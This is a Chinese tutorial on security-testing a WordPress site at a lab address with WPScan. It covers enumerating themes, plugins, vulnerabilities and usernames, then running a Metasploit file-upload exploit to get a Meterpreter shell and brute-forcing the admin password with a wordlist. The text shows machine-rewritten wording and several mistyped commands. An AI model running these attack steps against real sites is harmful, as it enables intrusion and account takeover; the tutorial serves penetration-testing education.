快捷搜索:  网络  后门  CVE  渗透  木马  扫描  黑客  as

WPScan使用完备攻略:怎么样对WordPress站点进行安全测试

严正声明:本文仅限于手艺探讨,严禁用于其他目的。

写在前面的话

在这篇文章中,我将告诉人人怎么样使用WPScan来对WordPress站点进行安全测试。

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞无线黑客,其中包括主题漏洞、插件漏洞以及WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞以及2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt如许的敏感文件,而且还能够检测当前已启用的插件以及其他功能。

接下来,让我们进入正题…

工具装置与运行

Kali Linux默认自带了WPScan,你也能够使用如下命令在本人的设备中装置WPScan:

git clone https://github.com/wpscanteam/wpscan.git

2.png怎么样对Wordpress站点进行安全测试

切换到WPScan目录中,运行如下命令查看帮助信息:

./wpscan.rb–h

3.png怎么样对Wordpress站点进行安全测试

你也能够使用下列命令更新漏洞库:

wpscan -update

扫描WordPress站点

我们可以使用–enumerate选项来扫描并发现关于目标站点主题、插件以及用户名信息。输入如下命令最先对服务器进行扫描:

./wpscan.rb –u http://192.168.0.101/wordpress/

要是你不知道目标服务器的IP地址,你可以直接输入URL地址。下面给出的是扫描效果:

怎么样对Wordpress站点进行安全测试

从效果中可以看到,服务器信息为Apache/2.4.6,PHP /5.5.9,WordPress v4.8.1。我们还发现,上传目录开启了目录监听功能,因此任何人都可以通过走访wp-content/uploads来查看目录中的上传内容。

主题扫描

使用如下命令对主题进行扫描:

./wpsca.rb –u http://192.168.0.101/wordpress --enumerate t

5.png怎么样对Wordpress站点进行安全测试

使用如下命令扫描主题中存在的漏洞:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vt

怎么样对Wordpress站点进行安全测试

插件扫描

插件可以扩大WordPress站点的功能,但很多插件中都存在安全漏洞,而这也会给攻击者提供可乘之机。

我们可以使用如下命令扫描WordPress站点中装置的插件:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate p

7.png

我们可以看到该网站中装置了Akismet v3.3.3,pixbay-images v2.14,wptouch v3.4.3和很多其他的插件。

怎么样对Wordpress站点进行安全测试

接下来,我们可以使用如下命令来扫描目标插件中的安全漏洞:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vp

怎么样对Wordpress站点进行安全测试

我们可以从扫描效果中看到这三款插件中存在的漏洞和行使路径:

怎么样对Wordpress站点进行安全测试

结合Metasploit行使插件中的漏洞

接下来,我们将用第一个插件中的任意文件上传漏洞来进行漏洞行使演示,该漏洞允许我们上传恶意文件并完成遥程代码执行。

关上终端窗口并输入如下命令:

useexploit/unix/webapp/wp_reflexgallery_file_upload
msfexploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101
msfexploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/
msfexploit(wp_reflexgallery_file_upload) > exploit

你将看到终端与目标设备确立了Meterpreter会话,你可以输入如下命令查看目标体系信息:

Sysinfo

怎么样对Wordpress站点进行安全测试

枚举WordPress用户名

我们可以在终端中输入如下命令来枚举WordPress用户名:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate u

怎么样对Wordpress站点进行安全测试

接下来工具将导出用户名数据表,你可以看到用户名和对应的ID信息。

当然了,你也能够使用如下命令枚举出所有的内容:

./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u
–e at : enumerate all themes of targeted website
–e ap: enumerate all plugins of targeted website
–e u: enumerate all usernames of targeted website

怎么样对Wordpress站点进行安全测试

使用WPScan进行暴力破解

在进行暴力破解攻击之前,我们需要创建对应的字典文件。输入如下命令:

./wpscan.rb –u http://192.168.0.101/wordpress/ --wordlist /root/Desktop/dict.txt --usernameadmin

怎么样对Wordpress站点进行安全测试

要是找到了相匹配的用户名与暗码,工具将直接以admin:password的情势显示出来:

怎么样对Wordpress站点进行安全测试

* 参考来源:hackmydevice,Alpha_pck编译,

您可能还会对下面的文章感兴趣: